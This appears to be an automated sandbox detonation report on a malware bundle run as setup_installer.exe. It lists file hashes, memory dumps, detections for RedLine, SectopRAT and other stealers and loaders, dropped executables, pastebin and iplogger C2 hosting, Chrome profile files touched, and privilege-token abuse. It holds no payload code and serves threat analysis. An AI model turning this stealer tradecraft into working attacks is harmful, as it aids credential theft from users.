memory/4900-193-0x0000000007B70000-0x00000000081EA000-memory.dmp

memory/4952-195-0x0000000006250000-0x0000000006868000-memory.dmp

memory/4952-197-0x00000000068F0000-0x00000000069FA000-memory.dmp

memory/4952-198-0x0000000006A00000-0x0000000006A3C000-memory.dmp

memory/4604-208-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4604-207-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4604-206-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-205-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4604-202-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4604-199-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4952-196-0x00000000068D0000-0x00000000068E2000-memory.dmp

memory/4900-194-0x0000000007210000-0x000000000722A000-memory.dmp

memory/4900-209-0x0000000007550000-0x000000000755A000-memory.dmp

memory/4900-213-0x0000000007740000-0x00000000077D6000-memory.dmp

memory/4900-221-0x00000000076D0000-0x00000000076E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fri20fbc038b0b02ea.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4984-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4568-232-0x0000000000400000-0x00000000016BC000-memory.dmp

memory/4900-233-0x0000000007720000-0x000000000772E000-memory.dmp

memory/4900-234-0x00000000077E0000-0x00000000077F4000-memory.dmp

memory/4900-235-0x0000000007820000-0x000000000783A000-memory.dmp

memory/4900-236-0x0000000007810000-0x0000000007818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\NuWKoG5w.G

MD5 4d073e6b58b793121a7d814201c17aa8
SHA1 924c01c515cdfb2c89948519113db84f272fb1b8
SHA256 b36d1359231ad7ad5d9bbcb908e2547c50d6bc724ac1e0b4a1da315752823a06
SHA512 4ea6a32bc7c23398e72108e3fe22475eb541777defdebf541f8a1b0a20a79891b8d8b9bb361affd14488d5f9d42f8eb949c0e385958da9b203839440813c3cd1

C:\Users\Admin\AppData\Local\Temp\pajqyzJ.o

MD5 394f820f75a9a6164a0ceff2db6037a1
SHA1 5843110d8ce5e27f0f3d7781151891bff9131664
SHA256 31a92c9d65ee868ca0b23ee616a590f3cd4ac22aef1846f33eda8abac4e8d007
SHA512 48ce7ee8114e126aa3f679f465bef64d062c88365607b1afe87cbb2faed88ec88109a2edcd610a72b937172d60668208cdf66fbfce640ffe25547294d1884b44

memory/4212-282-0x0000000000400000-0x00000000016D5000-memory.dmp

memory/4952-283-0x0000000000400000-0x00000000016E0000-memory.dmp

memory/4836-291-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1084-290-0x0000000000400000-0x0000000000414000-memory.dmp

memory/372-296-0x00000000031F0000-0x0000000003295000-memory.dmp

memory/372-300-0x00000000032A0000-0x0000000003332000-memory.dmp

memory/372-297-0x00000000032A0000-0x0000000003332000-memory.dmp

memory/2120-301-0x00000000033B0000-0x0000000003458000-memory.dmp

memory/2120-302-0x0000000003460000-0x00000000034F5000-memory.dmp

memory/2120-305-0x0000000003460000-0x00000000034F5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/372-311-0x0000000000400000-0x000000000054C000-memory.dmp

memory/2120-312-0x0000000000400000-0x0000000000629000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 c7c64b0aba4e28fc1d19b1b3946656e5
SHA1 afa03f1afe3b76218c3168db01df9fca215ae479
SHA256 027fd946bc166f858df84bf63ebd0849eaeb90e0d253068479feec73a86b2e49
SHA512 285146a880982803e158a89035aea1f10348c52ad2b793123be1a415a632ef267d9edc604fc3cc0ffd3b88e5ed3b494a1139ff1be4f0a239d05ec7e1b6a4e014

memory/4212-328-0x0000000000400000-0x00000000016D5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 9e34422f9c8265667ca6ca3d2c42d309
SHA1 3aa07dbe2841a2581f924b396fa33d16d0ea3418
SHA256 017867bd13deba49bce68be6ce49eb569bbe7ab64d6e89f791a6726afc0468e9
SHA512 76e841e084d94ecab8a485518e08c53a4e1ce706bb0a4a68d8e7b33844a264d746b6d581802e14d006830881bde7eaa0548124f9287b57611f80839367263401

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d9f690c37b23c1b814e8680fb6b38399
SHA1 61add990d379b5ca69ced3de467a235d443e5d53
SHA256 2d2206128bda01cc595dba614d7bf474e0ef94e2212c540bac28d003818e7a64
SHA512 73fefdc16b605b55932983324acc5fa8ff7d279561a63a3f83c9766cc3e1a10cf0a3780b8c42c7f28e5e3aa34d16a6031dc739e2e24184e4b5cd5a3320df3ac2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 76abc17f0bcde2c84ab37dbc56be647d
SHA1 d20e2d96957428fe8a8ea8ee8abf8711c562571b
SHA256 14b78bd9d9c2cc2329e8b05012e6fa074a0aa093c67ec01a45f74576c1fb20c3
SHA512 8149da4a8a5f3303337d6f624adae472c874b3a0f59267df003fbdd2d2e7bd11a55900f4d75cd2de25d0f1f0232127d88ab6817368faa7c512d9510be8a219e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 72122163c28c1c1cac772d3607627d4f
SHA1 471c61343a2ede860cc2c1d758d637e3e8421712
SHA256 8a174015857b64d77564a9d42d8d74b6b0363e5cad4b3f734100fbb349ba6675
SHA512 382d3620f6fd997c5556702e3fdec04f7ccf86f2fa77c85da9d0acafa945de5ede70e537789b61314d0dc58aa360cef2178bb706ffe92cb59cc39efede394ef1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 83f8f491d5d35969b8206dea572b7a1d
SHA1 e4eaf6154c071850f0dbf29ea7d37b45e705c4ea
SHA256 eb0eb2b6eed9ea622af864d3550030ffee646ce3a7aad564af00a5230ce88845
SHA512 a21f568a86ad3b485599ebb8cbd6ad8a26223cdb6ee13bb17b78de4d31586df1845285bdc7dd18700550a8e72568487af68404033307f7429811db147b2474e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 14a93595e828530a1f7d7f1fd010105c
SHA1 a2071864fe4a2c3b918be8766d40f574a23ff46d
SHA256 94b248bb81e1035d32b54b1ebdc1d02e2e3fea0fca2c786c5f95dca0f6c350e8
SHA512 4c0dc70898c5c7e9d3f558e093a7b237d3724f32a7afb75691ed373ec27928f61be9a63717e6140062ccecc6339bfdbf18586b4ee45b93203abf3608ffc23e99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9aa8a12d7d9f0bb33508cd5fa94206cb
SHA1 f289f40ae63f1068933a38919fee8b0f1cbf2409
SHA256 19c2f8b477b0b9893c73996d1faf0cab6eab6a09ecf2ffc83fb9047218e72836
SHA512 c09cd129073be5049bb6b2aaa460315441ef3c4a1cbe41dcd5063e6c1abfeecb19ef4bb0a355e0324e7763135f33f5bfd4d04a5a73754fd98d121a1dcec8b329

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 981d9a31d9e3938565495e6fb20bb2e6
SHA1 92a5c56f9f8e63d6df68981ed12df725f37ecb5e
SHA256 c066d94e421ba4a559f6b645a0659cb8c4f3b5df6232adde030a50affd3a347d
SHA512 0e3353d433bb7f16a9d62930018ac57c09e433bc187d4e3705b2d84845b5ae58859b6b0ce08a437e58b5e1514b123b1be2db01c480354b8df70c38dd40c021a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 df347779f16bf23a871ed250540a4a8b
SHA1 d59e42d6515eeec4b35cb96953e799d47d4ca7dc
SHA256 0c927db30119f4afed5dab73069fa47836dd76b4e6e0efb99b5677c1dbbf562a
SHA512 87a890601fb37c443bad6bbf88d597463cd10d2a78a636a805c389b72f122b94a9d5052a2acb1e8e035accfe1914f8a80126c7420218efe22e67c42b7eee4a04

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 92a83667a2fd3edfbef91e5e8a3432c8
SHA1 ed07ebbd410f6b393498342bb1311e3a9fd1ccef
SHA256 becb484c72261cc0f3b631e57d35870ecee4e430ec9518cd3aa017a09074b1bd
SHA512 92e0e303175099bf438b944517f925a47176fe70f7a360093ae68895bc57d18d32dbcd18560da3675298023106d21890383eda2653315a4cd15c2d127b49b435

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 08ed2ee12303e1f2a6e941e8a08438f2
SHA1 f8f3ae4c185fcd2f242165910d34ec0c08f05158
SHA256 9fbff9fdaa2cfedcc7e36f7985303d3b3f413dff25d28fba41f654baa2382697
SHA512 2507779244c20a95744ed96763f64279406c61271e5d212d30e21c9c7d8fe5f7672de80197267047cdd6b44de8fc1fe98441241af47ddfe20a9f20260136afca

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win7-20240708-en

Max time kernel

4s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
